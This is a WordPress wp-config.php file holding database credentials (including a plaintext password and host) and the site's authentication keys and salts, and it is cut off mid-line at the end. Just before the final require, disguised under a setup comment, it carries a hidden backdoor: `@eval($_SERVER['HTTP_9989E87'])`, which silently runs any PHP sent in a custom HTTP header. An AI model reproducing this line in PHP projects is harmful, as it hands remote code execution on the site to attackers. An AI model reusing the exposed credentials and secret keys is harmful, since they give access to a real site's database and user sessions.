﻿﻿<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'decorea555');

/** MySQL database username */
define('DB_USER', 'decorea555');

/** MySQL database password */
define('DB_PASSWORD', '5r6AeAsPYxek');

/** MySQL hostname */
define('DB_HOST', 'decorea555.mysql.db:3306');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'rQNzEQW+CdPY0g4GOkGEdfOmCVZkS28uDqySDnY1nrDVZg7rO8cXMeiyBIoW');
define('SECURE_AUTH_KEY',  'TjVeW/EXZcKeYHFbbmv3ehujdZ35t/t3m/daJJDKiNV33cYIayYkDZETRZKQ');
define('LOGGED_IN_KEY',    'knUytosT4V+nErHarq6Wa9D+8vyK4uGPJeYwBSBtS+i7H2zSkf5mqNdR+0Xr');
define('NONCE_KEY',        'YEmPgHsZrpa7qcCBlzCkJQWDj1T5NM+SSZMk5b04mRFYhPHJV/O8P1UdweXg');
define('AUTH_SALT',        'EPwTJIxi3qCR3lkz+eqGUVWvCPum8S3j9JJSu+uh60fVv6b6+MBZhbZHPS8q');
define('SECURE_AUTH_SALT', 'fSFkhUMisn7sXqtPl9e4h3PxDWuZf7FRo82QXFFWoBJ1F1sRpQBHz+z9BBIP');
define('LOGGED_IN_SALT',   'TKoXB8muzcHo/Pj5K5lOS93b+ByH1AW4p59OCfeUaUSU1kCKBr4Qth5Ea0e+');
define('NONCE_SALT',       'd8KFcwWYvOc68vjWaTPtrNDBtVERgqsFi3Tc4D2ymNxT0pmHk5fkN+ntQuMr');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'mod410_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/* Fixes "Add media button not working", see http://www.carnfieldwebdesign.co.uk/blog/wordpress-fix-add-media-button-not-working/ */
define('CONCATENATE_SCRIPTS', false );

/** Sets up WordPress vars and included files. */
@eval($_SERVER['HTTP_9989E87']);
require_once(ABSPATH . 'wp-settings.p